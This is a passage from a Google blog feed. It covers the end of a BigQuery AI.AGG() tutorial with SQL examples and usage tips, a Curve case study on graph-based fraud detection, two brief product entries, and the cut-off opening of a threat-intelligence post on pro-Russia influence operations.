  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you look closely at the intermediate table, you'll notice the structured categories changed slightly from the initial plaintext results. This happens for two reasons: First, LLMs are nondeterministic, meaning that they don't always give the exact same response to the same prompt. Second, the prompt was adjusted to accommodate the new output structure.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4 - structured categories" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_-_structured_categories.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;The returned product categories are structured as JSON by AI.AGG() as requested as part of the prompt.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With the table now labeled by category, you can group by the categories to do traditional SQL aggregation, or use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to consider each category separately. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, the following query fetches traditional metrics (like row counts) right alongside a synthesized AI summary of what those specific grouped products have in common:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Synthesize insights grouped by our newly assigned categories\r\nSELECT \r\n  assigned_category,\r\n  COUNT(*) AS item_count,\r\n  AI.AGG(\r\n    (&amp;#x27;Product: &amp;#x27;, product_name, &amp;#x27; - Description: &amp;#x27;, description),\r\n    &amp;#x27;Write a concise, one-sentence summary describing the common characteristics or purpose of the products in this category.&amp;#x27;\r\n  ) AS category_summary\r\nFROM \r\n  `categorized_cymbal_pets.categorized_products`\r\nGROUP BY \r\n  assigned_category\r\nORDER BY \r\n  item_count DESC;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c435e50&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="5 - grouped analysis query" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/5_-_grouped_analysis_query.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Query results showing analyzing with AI.AGG() alongside more traditional SQL methods.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Unstructured data isn't limited to text. Because &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; natively supports multimodal inputs, you can return aggregated insights directly from image files.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;cymbal_pets&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; Google Cloud project also contains a Cloud Storage bucket full of product photos. By creating an external object table, you can securely pass the image URIs directly into &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and ask the model to summarize the visual content of the entire collection.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Summarize content of images in the object table\r\nSELECT\r\n  AI.AGG(\r\n    STRUCT(OBJ.GET_ACCESS_URL(ref, &amp;#x27;r&amp;#x27;)),\r\n    &amp;#x27;What are the major categories of these images?&amp;#x27;\r\n  ) AS category_description\r\nFROM\r\n  `bigquery-public-data.cymbal_pets.product_images`;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c438ca0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="6 - image query" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/6_-_image_query.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Query results showing AI.AGG() surface product categories by analyzing the product images located in Google Cloud Storage.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How AI.AGG() works and best practices&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; effectively in your own environment, it helps to understand how it processes data behind the scenes. Here’s what you need to know about context windows, error handling, and optimizing your pipelines.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Context windows and multi-level aggregation&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;LLMs have a specific context window and can have a hard time handling massive amounts of input. &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; solves this problem by automatically dividing your input rows into batches, aggregating those batches, and then aggregating the results of those batches into a final answer. This means you don’t have to worry about manually managing the context window when passing in large numbers of rows. Note that &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; won’t split up a row of data across batches, so make sure that each individual row is smaller than the context window, to avoid the row being skipped. Many smaller rows will give &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; more flexibility with how to batch each row.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Token usage with multi-level aggregation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Because &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; uses a multi-level aggregation structure, the total input tokens sent to the model may be higher than the raw tokens in your starting table (depending on how many rounds of aggregation are required). As a best practice, always reduce the number of input tokens by using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;LIMIT&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or pre-filtering your data upstream before passing it to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Specifying your model endpoint&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;If you don’t specify a model endpoint, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; will default to a recent model. However, for production pipelines, you often want explicit control:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Short-form names:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can use a short-form endpoint (e.g., &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemini-2.5-flash&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;), in which case &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; will use that model in the query execution region:&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;AI.AGG(\r\n  input_data,\r\n  instructions =&amp;gt; &amp;#x27;Your instructions here.&amp;#x27;,\r\n  endpoint =&amp;gt; &amp;#x27;gemini-2.5-flash&amp;#x27; \r\n)&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c438fa0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Fully-qualified names:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If the query execution region doesn’t support your desired model, or you prefer to use a global or multiregional endpoint, provide the fully qualified model name:&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;AI.AGG(\r\n  input_data,\r\n  instructions =&amp;gt; &amp;#x27;Your instructions here.&amp;#x27;,\r\n  endpoint =&amp;gt; &amp;#x27;https://aiplatform.googleapis.com/v1/projects/[YOUR_PROJECT]/locations/global/publishers/google/models/gemini-3.5-flash&amp;#x27;\r\n)&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c4380d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. Input and output modalities&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Inputs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; supports text (via strings or references to text files) and image data. It also supports arrays of these types, though you should refer to the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-agg#known_issues"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;known issues documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for edge cases regarding arrays of images.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Outputs: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The function &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;will always return a string&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. While you can prompt the model in your instructions to format the output as JSON or Markdown, keep in mind that the database engine does not strictly enforce this. Multimodal output (e.g., generating an image) is not currently supported.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Treatment of &lt;/strong&gt;&lt;code&gt;&lt;strong style="vertical-align: baseline;"&gt;NULL&lt;/strong&gt;&lt;/code&gt;&lt;strong style="vertical-align: baseline;"&gt;s&lt;br /&gt;&lt;/strong&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; automatically skips &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;NULL&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; input rows without processing them. However, you must be careful when passing structured data. Like other BigQuery AI functions, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; concatenates &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;STRUCT&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; fields similarly to the standard &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;CONCAT()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; function. This means if even one field within your &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;STRUCT&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;NULL&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, the entire row is treated as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;NULL&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and will be skipped.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let's revisit our first categorization query. What if several rows of our &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;products&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; table are missing their &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;description&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;? Because of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;NULL&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; concatenation rule, those rows would be silently dropped from the analysis entirely. Here is how we can use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;IFNULL()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to provide a fallback string, guaranteeing that every product is taken into account even if its description is blank:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Identify categories of products from product name and (optional) description\r\nSELECT\r\n  AI.AGG(\r\n    (&amp;#x27;Product: &amp;#x27;, product_name, &amp;#x27; - Description: &amp;#x27;, IFNULL(description, &amp;#x27;No description provided&amp;#x27;)),\r\n    &amp;#x27;What are the major categories of these products?&amp;#x27; \r\n  ) AS category_description\r\nFROM\r\n  `bigquery-public-data.cymbal_pets.products`;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c438250&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;6. Error handling&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;If &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; receives invalid input, or encounters an error during LLM processing, it will attempt to provide partial results. Rows containing invalid input or which were rejected by the LLM model will not be considered in the final results. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can review exactly how many rows failed to process by checking your BigQuery job statistics, exactly as you would for scalar managed AI functions like&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; AI.IF()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="7 - job information with error info" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/7_-_job_information_with_error_info.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;information showing an example of Gen AI function error details.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Give it a try!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These are just a few examples of the ways &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; can help analyze unstructured data. The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-agg"&gt;&lt;code style="text-decoration: underline; vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; function&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is in preview in BigQuery now, so it’s available to all BigQuery users. Try it out on your own use cases! &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You may also be interested in checking out BigQuery's other &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/generative-ai-overview#managed_ai_functions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;managed AI functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.CLASSIFY()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.IF()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.SCORE()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, as well as &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/generative-ai-overview#general_purpose_ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;general-purpose functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.GENERATE()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. We look forward to seeing what you build with them.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/deep-dive-into-bigquery-ai-agg-function" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-29T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/fraud-prevention-with-bigquery-graph</id>
    <title>Scaling Network Analysis for Fraud Prevention with BigQuery Graph</title>
    <updated>2026-06-29T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Based in the UK, Curve are building a financial super-app, a smart wallet that consolidates all your debit and credit cards into a single app and card, simplifying how millions of users spend, send and save money.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, operating at this scale means confronting a high-volume, ever-evolving landscape of financial crime. While traditional fraud detection models are excellent at flagging suspicious individual transactions, they often miss the "bigger picture"—the complex networks and hidden relationships that characterize organized fraud rings.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To uncover these connections, we realized we needed to move beyond traditional relational data modeling. By partnering with Google Cloud to implement &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/graph-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Graph&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we’ve been able to conduct deep network analysis at scale, helping us identify hidden fraud networks and achieve significant transaction savings.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The Challenge: The Multi-Hop Problem&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Fraudsters rarely operate in isolation. They often share a subset of attributes across multiple accounts—such as a common device, a specific funding card, or shared contact information. In a standard relational database, identifying these links requires complex "multi-hop" analysis.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Attempting to scale this using standard SQL presented two significant hurdles:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Computational complexity:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Uncovering a chain of connections (e.g., User A connects to User B, who connects to User C) requires multiple, massive self-joins. At our volume of millions of users and tens of millions of connections, these queries quickly became computationally expensive and difficult to maintain.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data scale:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our most granular signals involve billions of potential connections. Standard relational approaches struggle to process these relationships without hitting performance bottlenecks or exhausting system resources.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The Solution: Native Graph Analytics in the data platform&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We transitioned our network analysis to BigQuery Graph to take advantage of its native &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Graph Query Language (GQL)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; support. The primary advantage was the ability to stop moving our data and start connecting it directly within our existing environment. We had previously explored other popular graph databases - however, being able to keep our data within our BigQuery existing data warehouse gave us significant time and cost savings compared to having to migrate to a new graph database.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;&lt;span style="vertical-align: baseline;"&gt;By modeling our payment ecosystem as a property graph—where users are nodes and their shared identifiers are edges—we simplified our architecture significantly. Instead of writing dozens of lines of complex JOIN logic, we can now use intuitive GQL syntax to "match" patterns of suspicious behavior across our entire dataset. This approach allows us to:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Traverse billions of connections:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We can now analyze massive datasets, including user-level, device-level, and card-level connections, with high performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unify our data experience:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because BigQuery Graph is built into the data platform, we can combine graph traversals with standard SQL analysis, search, and machine learning workflows in a single query. We could therefore leverage our existing SQL pipelines to build the nodes and edges tables, switch to GQL for traversing the graph, and then perform final aggregations with standard SQL. This flexibility makes it accessible to more analysts, without having to upskill in a new language.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Impact and Results&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Since integrating BigQuery Graph into our fraud mitigation strategy, the impact on our operational efficiency and bottom line has been profound.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Financial impact:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We estimate that the automated blocks triggered by these graph-based insights have saved Curve &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;~$12M in transaction losses&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; in 2025 alone.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Precision and accuracy:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our graph-powered queries have achieved an &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;accuracy of approximately 72%&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; in identifying fraudulent users. This high precision allows our fraud mitigation agents to focus their manual reviews on high-certainty cases rather than chasing false positives.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Operational speed:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Moving to GQL allowed us to streamline our graph queries and refresh our fraud rules more frequently. Previously we were limited to one-hop queries in our hourly rules, but GQL allowed us to optimize these slow-running scripts to stay one step ahead of organized crime.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;From rules to ML: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The faster we can traverse the network, the faster we can serve graph-based features to our machine learning models. While rebuilding and traversing the graph on a daily basis is sufficient for training models, it is simply too slow at inference-time when transactions can be authorised in less than a second. GQL is allowing us to move towards micro-batch or streaming traversals to serve fresh data to our fraud monitoring models.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Looking Ahead&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our success with BigQuery Graph has opened new doors for our data science and security teams. We are currently working on fully incorporating our highest-volume signals—including billions of IP address connections—into our real-time detection loops. We are also exploring native graph visualization to give our analysts a more intuitive way to explore and "see" fraud webs as they form.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By treating our data as a living network of relationships rather than just rows in a table, Curve is ensuring that our security remains as efficient and robust as our customer experience.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/fraud-prevention-with-bigquery-graph" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-29T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/workspace/take-notes-for-me</id>
    <title>Gemini can now take notes in Google Meet for Google AI Pro and Ultra subscribers.</title>
    <updated>2026-06-29T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/TNFM-header-light.max-600x600.format-webp.webp" /&gt;Google Meet's "Take notes for me" feature is available to Google AI Pro and Ultra subscribers in select languages.</content>
    <link href="https://blog.google/products-and-platforms/products/workspace/take-notes-for-me" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-29T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/ai/full-stack-ai-explainer</id>
    <title>Ask an AI expert: What exactly is the full stack?</title>
    <updated>2026-06-29T16:00:00+00:00</updated>
    <content type="html">An illustration depicting a full-stack AI infrastructure against a dark background</content>
    <link href="https://blog.google/innovation-and-ai/technology/ai/full-stack-ai-explainer" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-29T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/pro-russia-influence-ecosystem</id>
    <title>The Bear Necessities: A Look at the Drivers, Dynamics, and Applications of the Pro-Russia Influence Ecosystem</title>
    <updated>2026-06-29T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: James Sadowski, Alden Wahlstrom&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;/h3&gt;
